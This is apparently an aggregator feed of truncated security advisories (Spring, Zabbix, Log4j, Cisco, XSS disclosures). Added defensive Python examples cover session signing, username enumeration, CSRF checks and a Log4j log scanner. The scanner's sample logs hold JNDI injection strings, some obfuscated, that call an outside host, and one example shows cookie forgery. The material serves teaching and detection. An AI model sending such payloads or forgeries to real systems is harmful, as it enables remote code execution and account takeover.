Cyber Security WEBINAR — How to Ace Your InfoSec Board Deck
Communication is a vital skill for any leader at an organization, regardless of seniority. For security leaders, this goes double. Communicating clearly works on multiple levels. On the one hand, security leaders and CISOs must be able to communicate strategies clearly – instructions, incident...
Spring Framework insecurely handles PropertyDescriptor objects with data binding
Overview The Spring Framework insecurely handles PropertyDescriptor objects, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. Description The Spring Framework is a Java framework that can be used to create applications such as web applications....
CVSS 9.8 | AI Score 0.6 | EPSS 0.975
td-l-market.ru Cross Site Scripting vulnerability OBB-2429970
Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently...
Security update for conmon, libcontainers-common, libseccomp, podman (moderate)
An update that solves 7 vulnerabilities, contains one feature and has one errata is now available. Description: This update for conmon, libcontainers-common, libseccomp, podman fixes the following issues: podman was updated to 3.4.4. Security issues fixed: fix CVE-2021-41190 [bsc#1193273],...
CVSS 6.5 | AI Score -0.4 | EPSS 0.005
Horde Webmail 5.2.22 - Account Takeover via Email
Horde Webmail is a free, enterprise-ready, and browser-based communication suite developed by the Horde project. It is a popular webmail solution for universities and government agencies to exchange sensitive email messages on a daily basis. It is also shipped as part of the popular hosting...
AI Score -0.3
espace-evasion-delmoly.com Cross Site Scripting vulnerability OBB-2377962
Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently...
AI Score -0.1
espace-corps-pluriel.com Cross Site Scripting vulnerability OBB-2377956
Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently...
AI Score -0.1
Summary Actions to Help Protect Against Russian State-Sponsored Malicious Cyber Activity: • Enforce multifactor authentication. • Enforce strong, unique passwords. • Enable M365 Unified Audit Logs. • Implement endpoint detection and response tools. From at least January 2020, through...
CVSS 9.8 | AI Score 10 | EPSS 0.973
Zabbix - A Case Study of Unsafe Session Storage
Introduction Zabbix is a very popular open-source monitoring platform used to collect, centralize and track metrics like CPU load and network traffic across entire infrastructures. It is very similar to solutions like Pandora FMS and Nagios. Because of its popularity, features and its privileged...
CVSS 9.8 | AI Score 0.2 | EPSS 0.97
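The Zabbix entry above concerns session state that is handed to the client. The following added example (it is not Zabbix code and does not reproduce the specific Zabbix flaw) shows the general failure mode of client-held sessions: a cookie whose fields are trusted without verifying an integrity tag over the whole payload can be rewritten by the client, whereas an HMAC over the complete serialised payload, checked with a constant-time comparison before any field is read, rejects the forgery. The key, field names and cookie layout are assumptions chosen for illustration.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Server-side secret; in a real deployment it is generated at install time and
# never leaves the server. Constructed value for this example only.
SERVER_KEY = b"constructed-example-key-do-not-reuse"


def encode_session(fields: dict, key: bytes = SERVER_KEY) -> str:
    """Serialise session data into a client-held cookie, signing ALL of it."""
    payload = json.dumps(fields, sort_keys=True, separators=(",", ":")).encode()
    sig = hmac.new(key, payload, hashlib.sha256).hexdigest()
    blob = json.dumps({"data": payload.decode(), "sign": sig})
    return base64.b64encode(blob.encode()).decode()


def decode_session_unsafe(cookie: str) -> dict:
    """Anti-pattern: read the fields straight out of the cookie, check nothing."""
    blob = json.loads(base64.b64decode(cookie))
    return json.loads(blob["data"])


def decode_session_safe(cookie: str, key: bytes = SERVER_KEY) -> Optional[dict]:
    """Verify the MAC over the whole payload before any field is trusted.

    Returns None for a tampered, unsigned or malformed cookie.
    """
    try:
        blob = json.loads(base64.b64decode(cookie))
        payload = blob["data"].encode()
        expected = hmac.new(key, payload, hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, blob.get("sign", "")):
            return None
        return json.loads(payload)
    except (ValueError, KeyError, TypeError, AttributeError):
        return None


def forge(cookie: str, **overrides) -> str:
    """What a client can do without the key: rewrite fields, keep the old tag."""
    blob = json.loads(base64.b64decode(cookie))
    data = json.loads(blob["data"])
    data.update(overrides)
    blob["data"] = json.dumps(data, sort_keys=True, separators=(",", ":"))
    return base64.b64encode(json.dumps(blob).encode()).decode()


if __name__ == "__main__":
    cookie = encode_session({"sessionid": "abc", "userid": 7, "role": "user"})
    forged = forge(cookie, role="admin")
    print("unsafe decoder sees:", decode_session_unsafe(forged))
    print("safe decoder sees:", decode_session_safe(forged))
```

The point the safe decoder makes is that the signature must cover every field the server will later act on, and must be checked before any of them is read; verifying only some fields, or reading a field on a code path that skips verification, leaves the rest of the cookie attacker-controlled.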
Huawei EulerOS: Security Advisory for qemu (EulerOS-SA-2022-1105)
The remote host is missing an update for the Huawei...
CVSS 7.4 | AI Score 6.8
H3C SSL VPN Username Enumeration
Title: H3C SSL VPN Username Enumeration Advisory ID: ZSL-2022-5697 Type: Local/Remote Impact: Exposure of Sensitive Information Risk: (2/5) Release Date: 12.02.2022 Summary H3C SSL VPN is a secure VPN system based on SSL connections. It allows mobile employees to access corporate networks...
AI Score 7.2
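Username enumeration, the class of issue in the H3C advisory above, arises whenever a login endpoint answers differently for an account that exists and one that does not. The added example below is illustrative code, not the H3C product or the advisory's test: it contrasts a login handler that leaks existence through its error message (and by skipping the password hash for unknown users) with one that returns a uniform response and does the same work either way, and includes the probe an enumeration scan would run. The user store, salt and messages are constructed for the example.

```python
import hashlib
import hmac
from typing import Callable, Dict, Tuple

# Constructed user store: username -> (salt, PBKDF2-SHA256 hash). Example data only.
_SALT = b"constructed-salt"
_ITERATIONS = 50_000


def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, _ITERATIONS)


USERS: Dict[str, Tuple[bytes, bytes]] = {
    "alice": (_SALT, _hash("correct horse battery staple", _SALT)),
}
# Dummy credential used to spend the same effort when the username is unknown.
_DUMMY = (_SALT, _hash("dummy", _SALT))

LoginFn = Callable[[str, str], Tuple[bool, str]]


def login_enumerable(username: str, password: str) -> Tuple[bool, str]:
    """Leaks existence: distinct message, and no hashing work, for unknown users."""
    if username not in USERS:
        return False, "unknown user"
    salt, stored = USERS[username]
    if hmac.compare_digest(_hash(password, salt), stored):
        return True, "ok"
    return False, "wrong password"


def login_uniform(username: str, password: str) -> Tuple[bool, str]:
    """Same message and same amount of work whether or not the username exists."""
    salt, stored = USERS.get(username, _DUMMY)
    valid = hmac.compare_digest(_hash(password, salt), stored)
    # Guessing the dummy password for an unknown user must never log anyone in.
    valid = valid and username in USERS
    return (True, "ok") if valid else (False, "invalid username or password")


def oracle_distinguishes(login: LoginFn, known: str, unknown: str) -> bool:
    """Probe a login function the way an enumeration scan would: same wrong
    password against a known and an unknown account, compare the responses."""
    _, reply_known = login(known, "wrong-guess")
    _, reply_unknown = login(unknown, "wrong-guess")
    return reply_known != reply_unknown


if __name__ == "__main__":
    for fn in (login_enumerable, login_uniform):
        print(fn.__name__, "distinguishes accounts:",
              oracle_distinguishes(fn, "alice", "nobody"))
```

Response text is only one channel; the same probe should be repeated against status codes, redirects, response length and timing, which is why the uniform handler also performs the password hash for unknown users rather than returning early.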
espace-client.saria.fr Cross Site Scripting vulnerability OBB-2365211
Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently...
AI Score -0.1
td-safety.ru Cross Site Scripting vulnerability OBB-2365177
Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently...
td-barselona.ru Cross Site Scripting vulnerability OBB-2365175
Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently...
Description of the security update for SharePoint Foundation 2013: February 8, 2022 (KB5002155)
Summary This security update resolves a Microsoft SharePoint Server security feature bypass vulnerability. For more information about the vulnerability, see Microsoft Common Vulnerabilities and...
CVSS 4.3 | AI Score 6.6 | EPSS 0.001
WordPress < 5.8.3 - Object Injection Vulnerability
At the time of writing, WordPress powers 43% of websites on the Internet. Its simplicity and robustness enable millions of users to host their blog, eCommerce site, forum, or static website. To protect its users, several security hardening mechanisms were introduced to the code base in the past...
CVSS 7.2 | AI Score 1 | EPSS 0.004
td-favorit.ru Cross Site Scripting vulnerability OBB-2359797
Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently...
Critical Cisco Bugs Open VPN Routers to Cyberattacks
UPDATE Critical security vulnerabilities in Cisco’s Small Business RV Series routers could allow privilege escalation, remote code execution (RCE) with root privileges on the devices and more. The RV series is a set of affordable VPN appliances that enable remote workers to connect to a company...
CVSS 10 | AI Score 1.5 | EPSS 0.976
What is threat modeling? Definition, Methods, Example
Threat modeling is a method for improving the security of an application, system, or business process by identifying objectives and vulnerabilities, and then defining countermeasures to prevent or mitigate the effects of threats to the system. Threat modeling helps identify the security...
AI Score -0.2
Cross-site Scripting (XSS) - Reflected in pimcore/data-hub
Description pimcore Datahub is vulnerable to Reflected XSS in the Path of Documents, Assets and Objects in the Security Definition tab. Steps to reproduce: 1. Go to https://demo.pimcore.fun/admin/ and log in. 2. In the left menu bar, click the Datahub icon and click on any existing configuration, then...
AI Score 0.4
Introduction Are you an organization that manages or hosts a huge pool of resources on remote locations/servers? Well, host-based authority-validation technique is the most-suited way to manage the access and control rights related to your hardware and applications. Once implemented, this identity...
AI Score -0.3
Critical Cisco Contact Center Bug Threatens Customer-Service Havoc
A critical security bug affecting Cisco’s Unified Contact Center Enterprise (UCCE) portfolio could allow privilege-escalation and platform takeover. Cisco UCCE is an on-premises customer-service platform capable of supporting up to 24,000 customer-service agents using channels that include inbound...
CVSS 9.6 | AI Score -0.2 | EPSS 0.001
Cross-Site Request Forgery (CSRF) in livehelperchat/livehelperchat
Description A CSRF issue is found in the audit configuration under settings. No CSRF token validation is done on the server side: if the CSRF token is removed and the token field is left empty, the action is still performed. Proof of Concept Request: POST...
CVSS 4.3 | AI Score -0.4 | EPSS 0.001
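The livehelperchat report above describes a specific and common CSRF validation bug: the server accepts a request whose token field is present but empty. The added example below is not livehelperchat's code; it models a state-changing settings handler with two validators, one that reproduces that failure mode (an absent or empty token is treated as "nothing to check") and one that rejects missing, empty and mismatched tokens and compares in constant time. The session store, form field names and handler are constructed for the example.

```python
import hmac
import secrets
from typing import Callable, Dict, Optional

# Per-session token store: session id -> CSRF token. Constructed in-memory
# stand-in for whatever session backend a real application uses.
SESSION_TOKENS: Dict[str, str] = {}


def issue_token(session_id: str) -> str:
    """Generate a fresh token for the session; embed it in the settings form."""
    token = secrets.token_urlsafe(32)
    SESSION_TOKENS[session_id] = token
    return token


def csrf_ok_broken(session_id: str, form: Dict[str, str]) -> bool:
    """Reproduces the reported bug: an absent or empty token is not rejected."""
    submitted = form.get("csrf_token")
    if not submitted:
        return True  # "no token to check" is wrongly treated as passing
    return submitted == SESSION_TOKENS.get(session_id)


def csrf_ok_fixed(session_id: str, form: Dict[str, str]) -> bool:
    """Missing, empty or mismatched token all fail; comparison is constant-time."""
    submitted = form.get("csrf_token")
    expected = SESSION_TOKENS.get(session_id)
    if not submitted or not expected:
        return False
    return hmac.compare_digest(submitted, expected)


Validator = Callable[[str, Dict[str, str]], bool]


def save_audit_settings(check: Validator, session_id: str,
                        form: Dict[str, str]) -> Optional[dict]:
    """State-changing handler: returns the saved settings, or None if rejected."""
    if not check(session_id, form):
        return None
    return {"audit_enabled": form.get("audit_enabled") == "1"}


if __name__ == "__main__":
    sid = "sess-1"
    issue_token(sid)
    # A cross-site form post from an attacker's page cannot know the token,
    # but it can submit the field empty:
    forged = {"csrf_token": "", "audit_enabled": "0"}
    print("broken validator:", save_audit_settings(csrf_ok_broken, sid, forged))
    print("fixed validator: ", save_audit_settings(csrf_ok_fixed, sid, forged))
```

When testing an application for this bug, send the same state-changing request three ways: token removed, token present but empty, and token replaced with a random value of the right length. All three must be rejected; the report above shows the second case being accepted.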
Description of the security update for SharePoint Foundation 2013: January 11, 2022 (KB5002127)
Summary This security update resolves a Microsoft SharePoint Server remote code execution vulnerability and a Microsoft Office remote code execution vulnerability. To learn more about the vulnerabilities...
CVSS 8.8 | AI Score 9.1 | EPSS 0.056
WordPress 5.8.2 Stored XSS Vulnerability
WordPress is the world’s most popular content management system that, according to w3techs, is used by over 40% of all websites. This wide adoption makes it a top target for cyber criminals who seek to compromise high-traffic websites or infect as many web servers as possible. Its code is heavily...
CVSS 5.4 | AI Score -0.7 | EPSS 0.004
EulerOS Virtualization 3.0.2.6 : qemu-kvm (EulerOS-SA-2021-2855)
According to the versions of the qemu-kvm packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities : sd_wp_addr in hw/sd/sd.c in QEMU 4.2.0 uses an unvalidated address, which leads to an out-of-bounds read during...
CVSS 6.7 | AI Score 7.6 | EPSS 0.002
Huawei EulerOS: Security Advisory for qemu-kvm (EulerOS-SA-2021-2855)
The remote host is missing an update for the Huawei...
CVSS 7.8 | AI Score 6.4 | EPSS 0.002
Summary Apache Log4j Java logging library vulnerability - CVE-2021-44228 (affecting versions prior to v2.15) impacts DCNM Network Management Software. Vulnerability Details CVEID: CVE-2021-44228 DESCRIPTION: Apache Log4j could allow a remote attacker to execute arbitrary code on the system,...
CVSS 10 | AI Score 0.9 | EPSS 0.976
Summary Apache Log4j Java logging library vulnerability - CVE-2021-45046 (affecting versions prior to v2.16) impacts DCNM Network Management Software. Vulnerability Details CVEID: CVE-2021-45046 DESCRIPTION: Apache Log4j could result in remote code execution, caused by an incomplete fix of...
CVSS 10 | AI Score 0.8 | EPSS 0.976
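Both Log4j entries above (CVE-2021-44228 and its incomplete-fix follow-up CVE-2021-45046) are triggered by a logged string containing a `${jndi:...}` lookup. Since the entries only state the impact, the added example below shows the detection side a practitioner wants: a scanner over web-server log lines that first collapses the nested lookups attackers use to evade plain string matching (`${lower:j}`, `${upper:n}`, `${::-j}`, `${env:X:-j}`, `${sys:X:-j}`) and then matches the canonical form. This is illustrative code, not from the advisory or from any DCNM tooling; the log lines are constructed, the obfuscation forms it normalises are the common ones rather than an exhaustive list, and a hit means the line deserves investigation, not that exploitation succeeded.

```python
import re
from typing import Dict, List

# Innermost lookups that evaluate to a literal. The literal part excludes "${"
# so the loop in normalise() collapses nested lookups from the inside out.
_OBFUSCATION = re.compile(
    r"\$\{(?:lower:|upper:|::-|env:[^:}]*:-|sys:[^:}]*:-)([^${}]*)\}", re.I
)
# Canonical JNDI lookup prefix; scheme (ldap, rmi, dns, ...) is not restricted.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)


def normalise(s: str) -> str:
    """Replace each obfuscation lookup with its literal until nothing changes."""
    prev = None
    while prev != s:
        prev = s
        s = _OBFUSCATION.sub(lambda m: m.group(1), s)
    return s


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Return one record per line whose normalised form contains a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalise(line)
        if _JNDI.search(norm):
            hits.append({"line_no": n, "raw": line, "normalised": norm})
    return hits


# Constructed Apache combined-format lines (example data, not a real capture).
SAMPLE_LOG = [
    '203.0.113.10 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '203.0.113.12 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:rmi://203.0.113.5:1099/x}"',
    '203.0.113.13 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:ldap://203.0.113.5:1389/b}"',
    '203.0.113.14 - - [10/Dec/2021:12:00:05 +0000] "GET /login HTTP/1.1" 302 0 "-" "${${env:NOPE:-j}ndi:dns://203.0.113.5/c}"',
    '203.0.113.15 - - [10/Dec/2021:12:00:06 +0000] "GET /?q=${date:yyyy-MM-dd} HTTP/1.1" 200 512 "-" "curl/7.79"',
]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"line {hit['line_no']}: {hit['normalised']}")
```

Run it over the actual access, application and proxy logs from the window in which the system was exposed; because any logged attacker-controlled string is an injection point, headers beyond User-Agent (X-Forwarded-For, Referer, form fields) must be in the logs being scanned.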
Zoho ManageEngine ServiceDesk Plus before 12003 allows authentication bypass in certain admin...
CVSS 9.8 | AI Score 9.6 | EPSS 0.005
armee-air-espace-collection.gouv.fr Cross Site Scripting vulnerability OBB-2309490
Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently...
AI Score -0.3